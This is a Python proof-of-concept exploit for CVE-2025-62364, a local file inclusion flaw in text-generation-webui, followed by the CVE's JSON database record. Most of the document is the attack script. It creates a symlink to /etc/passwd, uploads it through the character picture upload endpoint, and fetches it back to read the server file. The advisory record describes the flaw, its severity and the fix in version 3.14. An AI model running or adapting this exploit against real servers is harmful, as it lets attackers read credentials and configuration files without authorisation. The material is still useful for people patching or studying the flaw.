CVE-2025-62364

#!/usr/bin/env python3 """ CVE-2025-62364 - text-generation-webui Local File Inclusion via Symlink PoC for demonstrating the character picture upload LFI vulnerability. """ import os import requests import tempfile TARGET_URL = "http://target-server:7860" # Default text-generation-webui port TARGET_FILE = "/etc/passwd" # File to read from the server def create_symlink_file(target_path, output_path): """Create a text file containing a symlink to the target file.""" # Remove existing file/symlink if os.path.exists(output_path) or os.path.islink(output_path): os.remove(output_path) # Create symbolic link os.symlink(target_path, output_path) print(f"[+] Created symlink: {output_path} -> {target_path}") def exploit(target_url, file_to_read): """Exploit the LFI vulnerability via character picture upload.""" # Step 1: Create a symlink file locally tmp_file = tempfile.mktemp(suffix=".txt") create_symlink_file(file_to_read, tmp_file) # Step 2: Upload the symlink file via the character picture upload endpoint upload_url = f"{target_url}/upload_character_picture" with open(tmp_file, "rb") as f: files = {"file": (os.path.basename(tmp_file), f, "text/plain")} response = requests.post(upload_url, files=files) print(f"[+] Upload response status: {response.status_code}") print(f"[+] Response body: {response.text[:500]}") # Step 3: Access the uploaded file to read its contents # The uploaded file path is typically returned or predictable # Access the file through the web interface file_url = f"{target_url}/characters/picture/{os.path.basename(tmp_file)}" content_response = requests.get(file_url) print(f"[+] File content ({file_to_read}):\n{content_response.text}") # Cleanup os.remove(tmp_file) return content_response.text if __name__ == "__main__": exploit(TARGET_URL, TARGET_FILE)

{"cve": {"id": "CVE-2025-62364", "sourceIdentifier": "[email protected]", "published": "2025-10-13T21:15:35.560", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "text-generation-webui is an open-source web interface for running Large Language Models. In versions through 3.13, a Local File Inclusion vulnerability exists in the character picture upload feature. An attacker can upload a text file containing a symbolic link to an arbitrary file path. When the application processes the upload, it follows the symbolic link and serves the contents of the targeted file through the web interface. This allows an unauthenticated attacker to read sensitive files on the server, potentially exposing system configurations, credentials, and other confidential information. This vulnerability is fixed in 3.14. No known workarounds exist."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.2, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.5, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-59"}]}], "references": [{"url": "https://github.com/oobabooga/text-generation-webui/commit/282aa1918907fceec7f903d3dc2bc8492ce8e885", "source": "[email protected]"}, {"url": "https://github.com/oobabooga/text-generation-webui/security/advisories/GHSA-66rw-q8w5-c2hg", "source": "[email protected]"}]}}